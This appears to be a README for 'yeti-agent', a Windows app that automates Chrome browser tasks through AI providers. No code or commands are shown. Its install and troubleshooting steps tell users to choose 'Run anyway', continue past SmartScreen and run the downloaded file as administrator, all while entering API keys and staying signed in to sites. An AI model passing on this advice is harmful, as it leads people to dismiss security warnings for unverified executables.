🐾 yeti-agent - Run AI Browser Tasks 24/7

🌟 What this is

yeti-agent is a desktop app for running browser tasks with AI. It opens a browser, follows your steps, and keeps working while you do other things.

It is built for people who want to automate web tasks without writing code. You can use it for sign-ins, form filling, data checks, simple web research, and other repeat browser work.

📦 What you need

Before you install yeti-agent on Windows, make sure you have:

Windows 10 or Windows 11
A stable internet connection
At least 8 GB of RAM
2 GB of free disk space
Google Chrome installed
A valid AI provider account, such as OpenAI, Anthropic Claude, or Gemini

🚀 Download and install

Visit the releases page
Find the latest release at the top of the page
Download the Windows file for your computer
If the file is zipped, right-click it and choose Extract All
Open the extracted folder
Double-click the app file to start it
If Windows asks for permission, choose Run anyway

If you do not see a Windows file, download the file that matches your system and use the name shown in the release notes.

🖥️ First launch

When you start yeti-agent for the first time:

Open the app
Enter your AI provider key
Choose the model you want to use
Make sure Chrome is installed
Let the app connect to the browser

After setup, the app is ready to run browser tasks.

⚙️ Set up your AI key

yeti-agent needs access to an AI model to understand tasks and make decisions.

Common options:

OpenAI
Anthropic Claude
Gemini

To set it up:

Open the settings panel in the app
Paste your API key
Save the settings
Test the connection

If the test works, the agent can start using the model you picked.

🤖 How it works

The app uses a browser control method called CDP, or Chrome DevTools Protocol. In plain terms, this means the app can talk to Chrome and guide it through web pages.

You tell the agent what you want, and it handles browser actions such as:

Opening pages
Clicking buttons
Filling forms
Reading page content
Moving between tabs
Waiting for pages to load

🧭 Common uses

You can use yeti-agent for tasks like:

Logging into websites
Checking prices
Gathering data from pages
Copying info into a spreadsheet
Filling repeat forms
Watching sites for changes
Running scheduled browser jobs

🧰 Basic workflow

A normal task looks like this:

Start the app
Connect your AI key
Open Chrome
Enter the task you want done
Watch the browser as the agent works
Review the result when it finishes

You can keep the app open and let it handle more than one task.

🔐 Browser setup

For the best results, use a clean Chrome profile.

Recommended steps:

Close extra Chrome windows
Sign in to the sites you use
Turn off extensions you do not need
Keep one browser session open while the agent runs

This helps the agent move through websites without extra pop-ups or prompts.

🧪 Example tasks

Here are simple examples you can try:

Search a website for product names
Open a login page and enter saved details
Visit a dashboard and collect numbers
Fill out a web form from a text list
Check if a page changed since yesterday
Open several tabs and compare content

Keep the first task simple so you can see how the app behaves.

🛠️ Troubleshooting

If the app does not start:

Make sure you downloaded the latest release
Check that Windows did not block the file
Run the app as administrator
Restart your computer and try again

If the browser does not connect:

Close all Chrome windows
Reopen Chrome
Check that Chrome is installed
Try again after restarting the app

If the AI key does not work:

Check for typing mistakes
Make sure the key is active
Confirm you chose the right provider
Save the settings again

If a site does not load right:

Refresh the page
Try a different Chrome profile
Turn off blockers or extra extensions
Run the task again

🧩 Project details

yeti-agent is part of a browser automation stack built around LLMs, Chrome, and task control. It fits tools that use:

AI agents
Browser automation
Chrome DevTools Protocol
MCP
Python
Docker

The app aims to keep browser work running without constant input.

📁 Repo topics

This project includes work around:

ai
ai-agent
anthropic
autonomous-agents
browser-automation
chrome-devtools-protocol
claude
docker
gemini
gpt-4
llm
mcp
nepal
openai
python
web-automation

🪟 Windows tips

For Windows users, these tips can help:

Keep Chrome updated
Use one browser session for testing
Store your AI key in a safe place
Give the app time to load pages
Use short task instructions at first
Leave Chrome open while tasks run

If Windows SmartScreen appears, choose the option that keeps the file and lets you continue after you confirm the source.

🧹 Simple usage rules

To get better results:

Use clear task text
Start with one action at a time
Avoid very long web forms on the first run
Keep pages stable while the agent works
Check the browser before starting a new task

Short, direct instructions usually work best

📌 License and support

Check the release page for the latest Windows build, version notes, and file names

If you build from source later, keep the same Chrome version and AI settings so the app behaves the same way across runs